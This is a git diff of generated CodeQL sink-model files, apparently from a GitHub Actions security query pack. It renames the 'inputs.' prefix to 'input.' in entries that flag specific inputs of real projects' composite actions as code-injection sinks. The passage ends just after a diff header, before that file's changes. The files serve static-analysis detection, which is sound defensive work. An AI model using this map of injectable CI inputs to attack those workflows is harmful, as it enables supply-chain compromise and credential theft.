diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 8513c7da64d..2f981b5bd63 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mamba-org/mamba", "*", "inputs.key_suffix", "code-injection", "generated"] - - ["mamba-org/mamba", "*", "inputs.key_base", "code-injection", "generated"] - - ["mamba-org/mamba", "*", "inputs.key_prefix", "code-injection", "generated"] \ No newline at end of file + - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "input.key_base", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "input.key_prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index a4ab8f025d0..5d3d44e914c 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml 
@@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["maplibre/maplibre-native", "*", "inputs.artifact-name", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.externalData", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testSpecArn", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testFilter", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testType", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.AWS_DEVICE_FARM_DEVICE_POOL_ARN", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.AWS_DEVICE_FARM_PROJECT_ARN", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testFile", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.appFile", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testPackageType", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.appType", "code-injection", "generated"] \ No newline at end of file + - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.externalData", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testSpecArn", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testFilter", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.AWS_DEVICE_FARM_DEVICE_POOL_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.AWS_DEVICE_FARM_PROJECT_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testFile", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.appFile", "code-injection", "generated"] + - 
["maplibre/maplibre-native", "*", "input.testPackageType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.appType", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index 7d82b2d3e9e..7b41c1b2721 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mastodon/mastodon", "*", "inputs.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file + - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index e466e17ddb4..505fbb22005 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mavlink/qgroundcontrol", "*", "inputs.aws_secret_access_key", "code-injection", "generated"] - - ["mavlink/qgroundcontrol", "*", "inputs.aws_key_id", "code-injection", "generated"] - - ["mavlink/qgroundcontrol", "*", "inputs.artifact_name", "code-injection", "generated"] \ No newline at end of file + - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "input.aws_key_id", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "input.artifact_name", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index 53881157a23..24223da3c89 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mdanalysis/mdanalysis", "*", "inputs.extra-pip-deps", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.full-deps", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.micromamba", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.mamba", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.extra-conda-deps", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.isolation", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.build-docs", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.build-tests", "code-injection", "generated"] \ No newline at end of file + - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.full-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.micromamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.mamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.extra-conda-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.isolation", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.build-docs", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.build-tests", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index 5ee6e863db6..b529c0117f4 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["medic/cht-core", "*", "inputs.hostname", "code-injection", "generated"] - - ["medic/cht-core", "*", "inputs.password", "code-injection", "generated"] - - ["medic/cht-core", "*", "inputs.username", "code-injection", "generated"] \ No newline at end of file + - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] + - ["medic/cht-core", "*", "input.password", "code-injection", "generated"] + - ["medic/cht-core", "*", "input.username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index 3f5a3b658c3..6a46669f05d 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["medusajs/medusa", "*", "inputs.pathToSeedData", "code-injection", "generated"] - - ["medusajs/medusa", "*", "inputs.password", "code-injection", "generated"] - - ["medusajs/medusa", "*", "inputs.email", "code-injection", "generated"] \ No newline at end of file + - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] + - ["medusajs/medusa", "*", "input.password", "code-injection", "generated"] + - ["medusajs/medusa", "*", "input.email", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index f5c13431126..ec2f45f31db 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml 
@@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["metabase/metabase", "*", "inputs.organization_name", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.github_token", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.username", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.test-args", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.clojure-version", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.include-log", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.message", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.mysql", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.postgres", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.openldap", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.maildev", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.edition", "code-injection", "generated"] \ No newline at end of file + - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.github_token", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.username", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.test-args", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.clojure-version", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.include-log", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.message", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.mysql", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.postgres", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.openldap", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.maildev", "code-injection", 
"generated"] + - ["metabase/metabase", "*", "input.edition", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index 4788f44e856..3574855be3c 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["metamask/action-create-release-pr", "*", "inputs.artifacts-path", "code-injection", "generated"] - - ["metamask/action-create-release-pr", "*", "inputs.created-pr-status", "code-injection", "generated"] - - ["metamask/action-create-release-pr", "*", "inputs.release-branch-prefix", "code-injection", "generated"] \ No newline at end of file + - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "input.created-pr-status", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "input.release-branch-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index 7c66229c174..4ee1b878e54 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["metamask/action-npm-publish", "*", "inputs.subteam", "code-injection", "generated"] \ No newline at end of file + - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index 9eb3bdcf5eb..8453a2d415c 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/fluentui", "*", "inputs.workspaces", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index 0db95acd5cd..dc86b795981 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/playwright", "*", "inputs.report_dir", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.connection_string", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.blob_prefix", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.output_dir", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.path", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.namePrefix", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.connection_string", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.blob_prefix", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.output_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.path", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.namePrefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index 785384aa207..ca9cc034d10 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/wsl", "*", "inputs.comment", "code-injection", "generated"] - - ["microsoft/wsl", "*", "inputs.similar_issues_text", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] + - ["microsoft/wsl", "*", "input.similar_issues_text", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index 24c4fb4bc70..b8aecfd5e3d 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["milvus-io/milvus", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index 72575eb7368..e7ac083da83 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mlflow/mlflow", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file + - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index b2b49fbba09..5cac21a0751 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["modin-project/modin", "*", "inputs.parallel", "code-injection", "generated"] - - ["modin-project/modin", "*", "inputs.runner", "code-injection", "generated"] - - ["modin-project/modin", "*", "inputs.activate-environment", "code-injection", "generated"] \ No newline at end of file + - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] + - ["modin-project/modin", "*", "input.runner", "code-injection", "generated"] + - ["modin-project/modin", "*", "input.activate-environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 6755f0d773c..83e1345edf2 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mozilla/addons-server", "*", "inputs.run", "code-injection", "generated"] - - ["mozilla/addons-server", "*", "inputs.push", "code-injection", "generated"] \ No newline at end of file + - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] + - ["mozilla/addons-server", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index 1b55ab2d549..8708afa3f3b 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mozilla/bedrock", "*", "inputs.", "code-injection", "generated"] \ No newline at end of file + - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index 84401828721..e4f1637603e 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mozilla/sccache", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index 35804a87f05..f8b636c4636 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["msys2/setup-msys2", "*", "inputs.systems", "code-injection", "generated"] \ No newline at end of file + - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index 981fe0fd348..f51d784d7c1 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mumble-voip/mumble", "*", "inputs.arch", "code-injection", "generated"] - - ["mumble-voip/mumble", "*", "inputs.type", "code-injection", "generated"] - - ["mumble-voip/mumble", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "input.type", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index 6c984a676d0..ac6af801a0e 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nasa/fprime", "*", "inputs.location", "code-injection", "generated"] \ No newline at end of file + - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index 1138d37fb5f..fb676663019 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nats-io/nats-server", "*", "inputs.label", "code-injection", "generated"] - - ["nats-io/nats-server", "*", "inputs.hub_password", "code-injection", "generated"] - - ["nats-io/nats-server", "*", "inputs.hub_username", "code-injection", "generated"] \ No newline at end of file + - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "input.hub_password", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "input.hub_username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 1418299b39a..503386ea3d4 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nearform-actions/optic-release-automation-action", "*", "inputs.build-command", "code-injection", "generated"] - - ["nearform-actions/optic-release-automation-action", "*", "inputs.actor-name", "code-injection", "generated"] - - ["nearform-actions/optic-release-automation-action", "*", "inputs.actor-email", "code-injection", "generated"] \ No newline at end of file + - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "input.actor-name", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "input.actor-email", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index fb67f66ce62..6d48d32e9fa 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nektos/act", "*", "inputs.test_input_optional", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.composite-input", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.some", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.test_input_required_with_default_overriden", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.test_input_required_with_default", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.test_input_optional_with_default_overriden", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.test_input_required", "code-injection", "generated"] \ No newline at end of file + - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] + - ["nektos/act", "*", "input.composite-input", "code-injection", "generated"] + - ["nektos/act", "*", "input.some", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_required_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_required_with_default", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_optional_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_required", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index 12aa48431db..ae6d1fcc1e8 100644 
--- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["neo4j-contrib/neo4j-apoc-procedures", "*", "inputs.project-name", "code-injection", "generated"] - - ["neo4j-contrib/neo4j-apoc-procedures", "*", "inputs.gradle-command", "code-injection", "generated"] \ No newline at end of file + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.gradle-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index 336af4b814b..48b98225721 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml 
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["neondatabase/neon", "*", "inputs.save_perf_report", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.real_s3_region", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.real_s3_bucket", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.run_with_real_s3", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.run_in_parallel", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.extra_params", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.test_selection", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file + - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.real_s3_region", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.real_s3_bucket", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.run_with_real_s3", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.run_in_parallel", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.extra_params", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.test_selection", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index 8d2170c47e2..14bfe57eb11 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["neovim/neovim", "*", "inputs.install_flags", "code-injection", "generated"] \ No newline at end of file + - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 854601e3dde..4b04351ab90 100644 --- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nhost/nhost", "*", "inputs.config", "code-injection", "generated"] \ No newline at end of file + - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 8a6074b8796..755147a6f1a 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nix-community/nixos-wsl", "*", "inputs.filename", "code-injection", "generated"] - - ["nix-community/nixos-wsl", "*", "inputs.expression", "code-injection", "generated"] \ No newline at end of file + - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] + - ["nix-community/nixos-wsl", "*", "input.expression", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index 48203004ed5..12017671b4e 100644 
